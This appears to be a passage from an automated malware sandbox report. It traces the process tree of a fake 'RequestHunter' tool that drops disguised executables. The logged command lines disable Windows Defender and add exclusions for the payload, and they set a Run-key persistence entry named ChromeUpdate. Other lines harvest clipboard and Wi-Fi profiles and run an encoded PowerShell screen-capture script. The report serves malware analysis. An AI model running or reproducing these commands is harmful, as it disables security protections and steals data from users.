PID 2340 wrote to memory of 400	2340	svchost.exe	cmd.exe
PID 2340 wrote to memory of 400	2340	svchost.exe	cmd.exe
PID 4604 wrote to memory of 3868	4604	cmd.exe	s.exe
PID 4604 wrote to memory of 3868	4604	cmd.exe	s.exe
PID 4604 wrote to memory of 3868	4604	cmd.exe	s.exe
PID 400 wrote to memory of 2968	400	cmd.exe	WMIC.exe
PID 400 wrote to memory of 2968	400	cmd.exe	WMIC.exe
PID 3076 wrote to memory of 4688	3076	based.exe	cmd.exe
PID 3076 wrote to memory of 4688	3076	based.exe	cmd.exe
PID 3076 wrote to memory of 4060	3076	based.exe	cmd.exe
PID 3076 wrote to memory of 4060	3076	based.exe	cmd.exe
PID 3076 wrote to memory of 4860	3076	based.exe	cmd.exe
PID 3076 wrote to memory of 4860	3076	based.exe	cmd.exe
PID 3076 wrote to memory of 3116	3076	based.exe	cmd.exe
PID 3076 wrote to memory of 3116	3076	based.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:64

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:512

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1116
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2988
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1228

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1280
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1444

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1612

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1672

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
- Modifies Internet Explorer settings
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1776

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1900

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1952

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2084

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2512

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2608

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:1128

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3320

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Enumerates connected drives
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3420
- C:\Users\Admin\AppData\Local\Temp\RequestHunter v2.2\RequestHunter.exe
  "C:\Users\Admin\AppData\Local\Temp\RequestHunter v2.2\RequestHunter.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Users\Admin\AppData\Local\Temp\Run.exe
    "C:\Users\Admin\AppData\Local\Temp\Run.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3200
  - - C:\Users\Admin\AppData\Local\Temp\spotify.exe
      "C:\Users\Admin\AppData\Local\Temp\spotify.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3372
    - - C:\Users\Admin\AppData\Local\Temp\spotify.exe
        
        "C:\Users\Admin\AppData\Local\Temp\spotify.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2288
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI33722\Build.exe -pbeznogym
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\_MEI33722\Build.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI33722\Build.exe -pbeznogym
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1416
        
        C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:708
        
        C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:4640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI7082\s.exe -pbeznogym
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:4604
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\_MEI7082\s.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI7082\s.exe -pbeznogym
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3868
        
        C:\ProgramData\main.exe
        
        "C:\ProgramData\main.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3356
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpD88D.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpD88D.tmp.bat
        13⤵
        
        PID:7992
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 3356"
        14⤵
        Enumerates processes with tasklist
        
        PID:7940
        
        C:\Windows\system32\find.exe
        
        find ":"
        14⤵
        
        PID:7932
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        14⤵
        Delays execution with timeout.exe
        
        PID:7832
        
        C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
        
        "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:7692
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        15⤵
        
        PID:8776
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        16⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:8924
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 7692 -s 2644
        15⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5312
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        12⤵
        Executes dropped EXE
        
        PID:5224
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        13⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:5900
        
        C:\ProgramData\setup.exe
        
        "C:\ProgramData\setup.exe"
        12⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        
        PID:5412
        
        C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4036
        
        C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:3076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
        10⤵
        
        PID:4688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        10⤵
        
        PID:4060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‍ .scr'"
        10⤵
        
        PID:4860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‍ .scr'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        10⤵
        
        PID:3116
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        11⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        10⤵
        
        PID:3508
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        11⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        10⤵
        
        PID:2520
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2968
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        10⤵
        
        PID:1028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        10⤵
        
        PID:2964
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        11⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:5000
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        10⤵
        
        PID:3372
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        11⤵
        
        PID:4292
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        10⤵
        
        PID:3944
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        11⤵
        Gathers system information
        
        PID:948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        10⤵
        
        PID:1856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG